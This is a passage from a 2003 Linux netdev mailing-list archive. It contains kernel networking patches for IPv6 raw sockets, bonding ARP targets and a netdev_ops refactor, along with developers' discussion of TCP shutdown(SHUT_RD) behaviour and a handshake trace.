linux-2.5/net/ipv6/raw.c 7 Jul 2003 02:28:36 -0000 1.32 +++ linux-2.5/net/ipv6/raw.c 8 Jul 2003 11:55:33 -0000 @@ -624,6 +624,7 @@ if (msg->msg_controllen) { opt = &opt_space; memset(opt, 0, sizeof(struct ipv6_txoptions)); + opt->tot_len = sizeof(struct ipv6_txoptions); err = datagram_send_ctl(msg, &fl, opt, &hlimit); if (err < 0) { -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From shmulik.hen@intel.com Tue Jul 8 06:40:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 06:40:57 -0700 (PDT) Received: from caduceus.jf.intel.com (fmr06.intel.com [134.134.136.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Dej2x028784 for ; Tue, 8 Jul 2003 06:40:46 -0700 Received: from talaria.jf.intel.com (talaria.jf.intel.com [10.7.209.7]) by caduceus.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h68DZ0609629 for ; Tue, 8 Jul 2003 13:35:00 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by talaria.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h68D6WR26138 for ; Tue, 8 Jul 2003 13:06:32 GMT Received: from jrslxjul1.npdj.intel.com ([10.12.254.186]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070806515419980 ; Tue, 08 Jul 2003 06:51:57 -0700 Date: Tue, 8 Jul 2003 16:40:33 +0300 (IDT) From: Shmulik Hen X-X-Sender: Reply-To: Shmulik Hen To: Jeff Garzik cc: linux-netdev , Amir Noam , bond-devel , Jay Vosburgh , Noam Marom , Shmulik Hen , "Chad N. Tindel" , Tsippy Mendelson Subject: [patch][bonding] fix arp targets' addresses initialization In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="202029822-1412134829-1057671633=:8183" X-archive-position: 3823 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shmulik.hen@intel.com Precedence: bulk X-list: netdev This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --202029822-1412134829-1057671633=:8183 Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, The recent patch to bonding that made it use the standard in_aton() function introduced a bug. The converted IP addresses are saved in the wrong array, thus no ARPs are sent at all to any of the addresses specified. Attached patches are against latest net-drivers 2.4 and 2.5 trees. -- | Shmulik Hen | | Israel Design Center (Jerusalem) | | LAN Access Division | | Intel Communications Group, Intel corp. | --202029822-1412134829-1057671633=:8183 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="patch-2.4.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: patch-2.4.diff Content-Disposition: attachment; filename="patch-2.4.diff" ZGlmZiAtTnVhcnAgbmV0LWRyaXZlcnMtMi40L2RyaXZlcnMvbmV0L2JvbmRp bmcvYm9uZF9tYWluLmMgbmV0LWRyaXZlcnMtMi40LWRldmVsL2RyaXZlcnMv bmV0L2JvbmRpbmcvYm9uZF9tYWluLmMNCi0tLSBuZXQtZHJpdmVycy0yLjQv ZHJpdmVycy9uZXQvYm9uZGluZy9ib25kX21haW4uYwlUdWUgSnVsICA4IDE2 OjI1OjM2IDIwMDMNCisrKyBuZXQtZHJpdmVycy0yLjQtZGV2ZWwvZHJpdmVy cy9uZXQvYm9uZGluZy9ib25kX21haW4uYwlUdWUgSnVsICA4IDE2OjI1OjM3 IDIwMDMNCkBAIC00NjAsNyArNDYwLDcgQEAgc3RydWN0IGJvbmRfcGFybV90 Ymwgew0KIA0KIHN0YXRpYyBpbnQgYXJwX2ludGVydmFsID0gQk9ORF9MSU5L X0FSUF9JTlRFUlY7DQogc3RhdGljIGNoYXIgKmFycF9pcF90YXJnZXRbTUFY X0FSUF9JUF9UQVJHRVRTXSA9IHsgTlVMTCwgfTsNCi1zdGF0aWMgdW5zaWdu ZWQgbG9uZyBhcnBfdGFyZ2V0W01BWF9BUlBfSVBfVEFSR0VUU10gPSB7IDAs IH0gOw0KK3N0YXRpYyB1MzIgYXJwX3RhcmdldFtNQVhfQVJQX0lQX1RBUkdF VFNdID0geyAwLCB9IDsNCiBzdGF0aWMgaW50IGFycF9pcF9jb3VudCA9IDA7 DQogc3RhdGljIHUzMiBteV9pcCA9IDA7DQogY2hhciAqYXJwX3RhcmdldF9o d19hZGRyID0gTlVMTDsNCkBAIC0zOTMwLDcgKzM5MzAsNyBAQCBzdGF0aWMg aW50IF9faW5pdCBib25kaW5nX2luaXQodm9pZCkNCiAgICAgICAgICAgICAg ICAgICAgICAgICBhcnBfaW50ZXJ2YWwgPSAwOw0KIAkJfSBlbHNlIHsgDQog CQkJdTMyIGlwID0gaW5fYXRvbihhcnBfaXBfdGFyZ2V0W2FycF9pcF9jb3Vu dF0pOyANCi0JCQkqKHUzMiAqKShhcnBfaXBfdGFyZ2V0W2FycF9pcF9jb3Vu dF0pID0gaXA7DQorCQkJYXJwX3RhcmdldFthcnBfaXBfY291bnRdID0gaXA7 DQogCQl9DQogICAgICAgICB9DQogDQo= --202029822-1412134829-1057671633=:8183 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="patch-2.5.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: patch-2.5.diff Content-Disposition: attachment; filename="patch-2.5.diff" ZGlmZiAtTnVhcnAgbmV0LWRyaXZlcnMtMi41L2RyaXZlcnMvbmV0L2JvbmRp bmcvYm9uZF9tYWluLmMgbmV0LWRyaXZlcnMtMi41LWRldmVsL2RyaXZlcnMv bmV0L2JvbmRpbmcvYm9uZF9tYWluLmMNCi0tLSBuZXQtZHJpdmVycy0yLjUv ZHJpdmVycy9uZXQvYm9uZGluZy9ib25kX21haW4uYwlUdWUgSnVsICA4IDE2 OjI1OjUwIDIwMDMNCisrKyBuZXQtZHJpdmVycy0yLjUtZGV2ZWwvZHJpdmVy cy9uZXQvYm9uZGluZy9ib25kX21haW4uYwlUdWUgSnVsICA4IDE2OjI1OjUw IDIwMDMNCkBAIC00NDMsNyArNDQzLDcgQEAgc3RydWN0IGJvbmRfcGFybV90 Ymwgew0KIA0KIHN0YXRpYyBpbnQgYXJwX2ludGVydmFsID0gQk9ORF9MSU5L X0FSUF9JTlRFUlY7DQogc3RhdGljIGNoYXIgKmFycF9pcF90YXJnZXRbTUFY X0FSUF9JUF9UQVJHRVRTXSA9IHsgTlVMTCwgfTsNCi1zdGF0aWMgdW5zaWdu ZWQgbG9uZyBhcnBfdGFyZ2V0W01BWF9BUlBfSVBfVEFSR0VUU10gPSB7IDAs IH0gOw0KK3N0YXRpYyB1MzIgYXJwX3RhcmdldFtNQVhfQVJQX0lQX1RBUkdF VFNdID0geyAwLCB9IDsNCiBzdGF0aWMgaW50IGFycF9pcF9jb3VudCA9IDA7 DQogc3RhdGljIHUzMiBteV9pcCA9IDA7DQogY2hhciAqYXJwX3RhcmdldF9o d19hZGRyID0gTlVMTDsNCkBAIC0zODExLDcgKzM4MTEsNyBAQCBzdGF0aWMg aW50IF9faW5pdCBib25kaW5nX2luaXQodm9pZCkNCiAgICAgICAgICAgICAg ICAgICAgICAgICBhcnBfaW50ZXJ2YWwgPSAwOw0KIAkJfSBlbHNlIHsgDQog CQkJdTMyIGlwID0gaW5fYXRvbihhcnBfaXBfdGFyZ2V0W2FycF9pcF9jb3Vu dF0pOyANCi0JCQkqKHUzMiAqKShhcnBfaXBfdGFyZ2V0W2FycF9pcF9jb3Vu dF0pID0gaXA7DQorCQkJYXJwX3RhcmdldFthcnBfaXBfY291bnRdID0gaXA7 DQogCQl9DQogICAgICAgICB9DQogDQo= --202029822-1412134829-1057671633=:8183-- From jmorris@intercode.com.au Tue Jul 8 08:28:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 08:28:27 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:XBuZTrx4BLhOZb5Dd0N7WYhyTpLPTPpp@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68FSH2x005274 for ; Tue, 8 Jul 2003 08:28:19 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h68FRxr19399; Wed, 9 Jul 2003 01:28:00 +1000 Date: Wed, 9 Jul 2003 01:27:59 +1000 (EST) From: James Morris To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: davem@redhat.com, , Thomas Graf Subject: Re: [PATCH] IPV6: Fix BUG when appending destination options headers In-Reply-To: <20030708.221834.127574909.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3824 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Tue, 8 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > This patch fixes BUG when pushing IPv6 destination options over an > IPv6 raw socket. Patch is based on one from Thomas Graf . Applied to bk://kernel.bkbits.net/jmorris/ipv6-2.5 - James -- James Morris From mtk-lists@gmx.net Tue Jul 8 09:09:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 09:09:30 -0700 (PDT) Received: from mx0.gmx.net (mx0.gmx.net [213.165.64.100]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68G9L2x006797 for ; Tue, 8 Jul 2003 09:09:22 -0700 Received: (qmail 8673 invoked by uid 0); 8 Jul 2003 16:09:15 -0000 Date: Tue, 8 Jul 2003 18:09:14 +0200 (MEST) From: mtk-lists@gmx.net To: netdev@oss.sgi.com MIME-Version: 1.0 Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? X-Priority: 3 (Normal) X-Authenticated-Sender: #0018454895@gmx.net X-Authenticated-IP: [212.18.21.202] Message-ID: <27084.1057680554@www6.gmx.net> X-Mailer: WWW-Mail 1.6 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-archive-position: 3825 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mtk-lists@gmx.net Precedence: bulk X-list: netdev Hello, There was no response to the note below. Is netdev the right place to raise this subject? Cheers Michael ------- Forwarded message follows ------- Date sent: Tue, 1 Jul 2003 13:23:49 +0200 (MEST) From: mtk-lists@gmx.net To: netdev@oss.sgi.com BCC to: michael.kerrisk@gmx.net Subject: shutdown() and SHUT_RD on TCP sockets - broken? Hello, I've done quite some searching, but have so far not found an answer to the question of why does the behaviour described below occur on Linux... According to SUSv3, if we perform a shutdown(fd, SHUT_RD) on a socket, then further reads on that socket should be disabled. In the AF_UNIX domain, all is fine -- things operate as I expect. However, for TCP sockets, things are different (tested on 2.2.14, and 2.4.20): 1. If we perform a read() on the socket and there is no data, then 0 (EOF) is (immediately) returned. (This is what I expected.) 2. However, the peer can still write() to the socket, and afterwards we can read() that data from the socket, even though the reading half of the socket should be shut down. Instead of this behaviour, I expected the read() to continue to return 0 as in point 1. This is what we see for example in FreeBSD 4.8, Tru64 5.1B, and HP/UX 11. I thought that most implementations (other than Linux) did things this way, but I've just now gone and tested things on Solaris 8, and it seems to behave in the same way as Linux. I've read the relevant source code to confirm the anomalous behaviour described here. But, why do things happen in this way on Linux? 3. (A side point.) Looking at Stevens UNPv1, p161, there is a statement that after a SHUT_RD, "any data for a TCP socket is acknowledged and then silently discarded". This implies to me that the sender could keep on writing to the socket and never block. However, on Linux, if the peer keeps sending to a socket, then eventually (the channel is filled and) it blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, HP/UX 11 and Solaris 8. Have I misunderstood Stevens, or has something changed since the implementation he described (or was his statement wrong)? (In the AF_UNIX domain on Linux, the peer gets SIGPIPE/EPIPE if it keeps writing after a local SHUT_RD.) Thanks Michael -- +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Jetzt ein- oder umsteigen und USB-Speicheruhr als Prämie sichern! From jmorris@intercode.com.au Tue Jul 8 09:28:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 09:28:28 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:qSgcuNLQOEudkYz67FgECyo3FYdtmZfn@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68GSM2x007642 for ; Tue, 8 Jul 2003 09:28:23 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h68GSDr19679; Wed, 9 Jul 2003 02:28:13 +1000 Date: Wed, 9 Jul 2003 02:28:12 +1000 (EST) From: James Morris To: mtk-lists@gmx.net cc: netdev@oss.sgi.com, Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? In-Reply-To: <27084.1057680554@www6.gmx.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3826 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Tue, 8 Jul 2003 mtk-lists@gmx.net wrote: > Hello, > > There was no response to the note below. Is netdev the right place to > raise this subject? Yes. I believe Alexey has some reservations about the specified behavior. - James -- James Morris From ak@suse.de Tue Jul 8 09:55:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 09:55:21 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68GtB2x008305 for ; Tue, 8 Jul 2003 09:55:12 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id F19B9142AB; Tue, 8 Jul 2003 18:55:05 +0200 (MEST) Date: Tue, 8 Jul 2003 18:55:04 +0200 From: Andi Kleen To: mtk-lists@gmx.net Cc: netdev@oss.sgi.com Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? Message-Id: <20030708185504.385c0d55.ak@suse.de> In-Reply-To: <27084.1057680554@www6.gmx.net> References: <27084.1057680554@www6.gmx.net> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3827 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On Tue, 8 Jul 2003 18:09:14 +0200 (MEST) mtk-lists@gmx.net wrote: > 1. If we perform a read() on the socket and there is no data, then 0 > (EOF) is (immediately) returned. (This is what I expected.) > > 2. However, the peer can still write() to the socket, and afterwards > we can read() that data from the socket, even though the reading half > of the socket should be shut down. Instead of this behaviour, I > expected the read() to continue to return 0 as in point 1. This is what we > see for example in FreeBSD 4.8, Tru64 5.1B, and HP/UX 11. The problem is that it adds a new check to the input path. It's not clear how the check can be done outside the fast path (one way would be to shrink the window forcedly and drop the receiver into slow path, but that would be a severe protocol violation if the shrunk window leaks out with some ACK). I don't think it's a good idea to add a check for such an obscure situation to the fast path. > > 3. (A side point.) Looking at Stevens UNPv1, p161, there is a statement > that after a SHUT_RD, "any data for a TCP socket is acknowledged and then > silently discarded". This implies to me that the sender could keep on > writing to the socket and never block. However, on Linux, if the peer > keeps sending to a socket, then eventually (the channel is filled and) it > blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, HP/UX 11 That's because the data is not discarded so the window fills. > and Solaris 8. Have I misunderstood Stevens, or has something changed > since the implementation he described (or was his statement wrong)? (In Probably Stevens was confused. -Andi From kuznet@ms2.inr.ac.ru Tue Jul 8 10:03:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 10:03:37 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68H3R2x008828 for ; Tue, 8 Jul 2003 10:03:28 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id VAA13437; Tue, 8 Jul 2003 21:03:07 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307081703.VAA13437@dub.inr.ac.ru> Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? To: jmorris@intercode.com.au (James Morris) Date: Tue, 8 Jul 2003 21:03:07 +0400 (MSD) Cc: mtk-lists@gmx.net, netdev@oss.sgi.com In-Reply-To: from "James Morris" at éÀÌ 09, 2003 02:28:12 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3828 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, > HP/UX 11 and Solaris 8. Have I misunderstood Stevens, Most likely, it is that rare case when Stevens forgot to check the statement. From viewpoint of TCP the behaviour described in Stevens' book is highly unnatural. SHUT_RD on TCP does not make any sense. > described here. But, why do things happen in this way on Linux? Actually, you could check one more thing. What does happen after freebsd 4.8 returns 0 on read()? Does it open window eventually? As you checked, all the stacks ignore SHUT_RD, when receiving data and queue it anyway. And when read()ing Linux and, apparently Solaris, prefer to return this data. Alexey From palbrecht@qwest.net Tue Jul 8 10:26:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 10:27:14 -0700 (PDT) Received: from mpls-qmqp-01.inet.qwest.net (mpls-qmqp-01.inet.qwest.net [63.231.195.112]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68HQu2x010024 for ; Tue, 8 Jul 2003 10:26:56 -0700 Received: (qmail 28098 invoked by uid 0); 8 Jul 2003 17:26:55 -0000 Received: from unknown (63.231.195.5) by mpls-qmqp-01.inet.qwest.net with QMQP; 8 Jul 2003 17:26:55 -0000 Received: from 0-1pool151-16.nas8.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.151.16) by mpls-pop-05.inet.qwest.net with SMTP; 8 Jul 2003 17:26:54 -0000 Date: Tue, 8 Jul 2003 12:23:37 -0700 Message-ID: <001401c34586$6f955e20$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Andi Kleen" Cc: niv@us.ibm.com, linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel><001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel><3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel><000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel><3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel><001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0011_01C3454B.C1D79260" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3829 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net Precedence: bulk X-list: netdev This is a multi-part message in MIME format. ------=_NextPart_000_0011_01C3454B.C1D79260 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Andi Kleen writes: > > The 4.4BSD-Lite code described in Stevens is long outdated. All modern > BSDs (and probably most other Unixes too) do it in a similar way to what > Nivedita described. The keywords are "syn flood attack" and "DoS". > I have attached a copy of tcpdump output for two linux systems connected over ether replaying the scenario for incoming request queue handling given in Stevens's TCP/IP Illustrated Volume 1: The Protocols. What I don't understand about the third handshake is if the server is going to send the syn/ack in response the client's initial syn then why does server repeatly ignore the subsequent ack from the client? ------=_NextPart_000_0011_01C3454B.C1D79260 Content-Type: text/plain; name="trace.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="trace.txt" 01:12:09.622208 client.acme.net.1024 > server.acme.net.7777: S = 2730884988:2730884988(0) win 5840 (DF) 01:12:09.623457 server.acme.net.7777 > client.acme.net.1024: S = 1682786145:1682786145(0) ack 2730884989 win 5792 (DF) 01:12:09.623963 client.acme.net.1024 > server.acme.net.7777: . ack = 1682786146 win 5840 (DF) 01:12:11.858191 client.acme.net.1025 > server.acme.net.7777: S = 2743503110:2743503110(0) win 5840 (DF) 01:12:11.858991 server.acme.net.7777 > client.acme.net.1025: S = 1690738882:1690738882(0) ack 2743503111 win 5792 (DF) 01:12:11.859535 client.acme.net.1025 > server.acme.net.7777: . ack = 1690738883 win 5840 (DF) 01:12:13.909895 client.acme.net.1026 > server.acme.net.7777: S = 2736891141:2736891141(0) win 5840 (DF) 01:12:13.910636 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:13.911144 client.acme.net.1026 > server.acme.net.7777: . ack = 1692403888 win 5840 (DF) 01:12:17.502319 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:17.502909 client.acme.net.1026 > server.acme.net.7777: . ack = 1692403888 win 5840 (DF) 01:12:23.502350 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:23.502969 client.acme.net.1026 > server.acme.net.7777: . ack = 1692403888 win 5840 (DF) 01:12:35.702302 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:35.702840 client.acme.net.1026 > server.acme.net.7777: . ack = 1692403888 win 5840 (DF) 01:12:59.702343 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:59.702994 client.acme.net.1026 > server.acme.net.7777: . ack = 1692403888 win 5840 (DF) ------=_NextPart_000_0011_01C3454B.C1D79260-- From willy@www.linux.org.uk Tue Jul 8 10:52:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 10:52:56 -0700 (PDT) Received: from www.linux.org.uk (IDENT:4vBE4wuPSC5KCPsn6hIdI7xNi7UYOIOv@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Hqg2x010515 for ; Tue, 8 Jul 2003 10:52:43 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19ZvMY-0007KY-SR; Tue, 08 Jul 2003 17:30:42 +0100 Date: Tue, 8 Jul 2003 17:30:42 +0100 From: Matthew Wilcox To: Jeff Garzik , Arnaldo Carvalho de Melo Cc: netdev@oss.sgi.com Subject: [PATCH] netdev_ops Message-ID: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4.1i X-archive-position: 3830 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev After a conversation with acme, I realised that ethtool_ops is far too narrow scope. What we need are netdev_ops. This patch renames the ethtool_ops to netdev_ops and fixes some other minor flaws: - add _len() ops for operations which previously had to kmalloc their own memory. - move the netdev_ops from ethtool.h to netdevice.h - makes some ops generic as requested by Jeff Garzik. I think netdev_ops is still a little too ethtool-specific; something I'd like to do is convert the parameters to be a little less ethtool-related. For example, instead of ->get_drvinfo, I'd like to see ethtool_get_drvinfo() call several methods and fill in all the data that way. But let's see what everyone thinks of this patch first ... Index: include/linux/ethtool.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/ethtool.h,v retrieving revision 1.5 diff -u -p -r1.5 ethtool.h --- include/linux/ethtool.h 14 Jun 2003 22:16:01 -0000 1.5 +++ include/linux/ethtool.h 8 Jul 2003 15:25:49 -0000 @@ -12,6 +12,7 @@ #ifndef _LINUX_ETHTOOL_H #define _LINUX_ETHTOOL_H +#include /* This should work for both 32 and 64 bit userland. */ struct ethtool_cmd { @@ -97,7 +98,7 @@ struct ethtool_coalesce { u32 rx_max_coalesced_frames; /* Same as above two parameters, except that these values - * apply while an IRQ is being services by the host. Not + * apply while an IRQ is being serviced by the host. Not * all cards support this feature and the values are ignored * in that case. */ @@ -119,7 +120,7 @@ struct ethtool_coalesce { u32 tx_max_coalesced_frames; /* Same as above two parameters, except that these values - * apply while an IRQ is being services by the host. Not + * apply while an IRQ is being serviced by the host. Not * all cards support this feature and the values are ignored * in that case. */ Index: include/linux/netdevice.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/netdevice.h,v retrieving revision 1.14 diff -u -p -r1.14 netdevice.h --- include/linux/netdevice.h 2 Jul 2003 22:08:52 -0000 1.14 +++ include/linux/netdevice.h 8 Jul 2003 15:14:38 -0000 @@ -42,6 +42,7 @@ struct divert_blk; struct vlan_group; +struct netdev_ops; #define HAVE_ALLOC_NETDEV /* feature macro: alloc_xxxdev functions are available. */ @@ -299,6 +300,8 @@ struct net_device * See for details. Jean II */ struct iw_handler_def * wireless_handlers; + struct netdev_ops *netdev_ops; + /* * This marks the end of the "visible" part of the structure. All * fields hereafter are internal to the system, and may change at @@ -484,6 +487,102 @@ struct packet_type struct list_head list; }; +/* Some generic methods drivers may use in their netops */ +u32 netdev_op_get_link(struct net_device *dev); +u32 netdev_op_get_tx_csum(struct net_device *dev); +u32 netdev_op_get_sg(struct net_device *dev); +int netdev_op_set_sg(struct net_device *dev, u32 data); + +struct ethtool_cmd; +struct ethtool_drvinfo; +struct ethtool_regs; +struct ethtool_wolinfo; +struct ethtool_eeprom; +struct ethtool_coalesce; +struct ethtool_ringparam; +struct ethtool_pauseparam; +struct ethtool_test; +struct ethtool_gstrings; +struct ethtool_stats; + +/** + * &netdev_ops - Alter and report network device settings + * get_settings: Get device-specific settings + * set_settings: Set device-specific settings + * get_drvinfo: Report driver information + * get_regs: Get device registers + * get_wol: Report whether Wake-on-Lan is enabled + * set_wol: Turn Wake-on-Lan on or off + * get_msglevel: Report driver message level + * set_msglevel: Set driver message level + * nway_reset: Restart autonegotiation + * get_link: Get link status + * get_eeprom: Read data from the device EEPROM + * set_eeprom: Writedata to the device EEPROM + * get_coalesce: Get interrupt coalescing parameters + * set_coalesce: Set interrupt coalescing parameters + * get_ringparam: Report ring sizes + * set_ringparam: Set ring sizes + * get_pauseparam: Report pause parameters + * set_pauseparam: Set pause paramters + * get_rx_csum: Report whether receive checksums are turned on or off + * set_rx_csum: Turn receive checksum on or off + * get_tx_csum: Report whether transmit checksums are turned on or off + * set_tx_csum: Turn transmit checksums on or off + * get_sg: Report whether scatter-gather is enabled + * set_sg: Turn scatter-gather on or off + * self_test: Run specified self-tests + * get_strings: Return a set of strings that describe the requested objects + * phys_id: Identify the device + * get_stats: Return statistics about the device + * + * Description: + * + * Each operation is passed a &struct net_device as its first parameter. + * + * get_settings: + * @get_settings is passed an ðtool_cmd to fill in. It returns + * an negative errno or zero. + * + * set_settings: + * @set_settings is passed an ðtool_cmd and should attempt to set + * all the settings this device supports. It may return an error value + * if something goes wrong (otherwise 0). + */ +struct netdev_ops { + int (*get_settings)(struct net_device *, struct ethtool_cmd *); + int (*set_settings)(struct net_device *, struct ethtool_cmd *); + void (*get_drvinfo)(struct net_device *, struct ethtool_drvinfo *); + int (*get_regs_len)(struct ethtool_regs *); + void (*get_regs)(struct net_device *, struct ethtool_regs *, void *); + void (*get_wol)(struct net_device *, struct ethtool_wolinfo *); + int (*set_wol)(struct net_device *, struct ethtool_wolinfo *); + u32 (*get_msglevel)(struct net_device *); + void (*set_msglevel)(struct net_device *, u32); + int (*nway_reset)(struct net_device *); + u32 (*get_link)(struct net_device *); + int (*get_eeprom)(struct net_device *, struct ethtool_eeprom *); + int (*set_eeprom)(struct net_device *, struct ethtool_eeprom *); + int (*get_coalesce)(struct net_device *, struct ethtool_coalesce *); + int (*set_coalesce)(struct net_device *, struct ethtool_coalesce *); + void (*get_ringparam)(struct net_device *, struct ethtool_ringparam *); + int (*set_ringparam)(struct net_device *, struct ethtool_ringparam *); + void (*get_pauseparam)(struct net_device *, struct ethtool_pauseparam*); + int (*set_pauseparam)(struct net_device *, struct ethtool_pauseparam*); + u32 (*get_rx_csum)(struct net_device *); + int (*set_rx_csum)(struct net_device *, u32); + u32 (*get_tx_csum)(struct net_device *); + int (*set_tx_csum)(struct net_device *, u32); + u32 (*get_sg)(struct net_device *); + int (*set_sg)(struct net_device *, u32); + int (*self_test_len)(struct ethtool_test *); + void (*self_test)(struct net_device *, struct ethtool_test *, u64 *); + int (*get_strings_len)(struct ethtool_gstrings 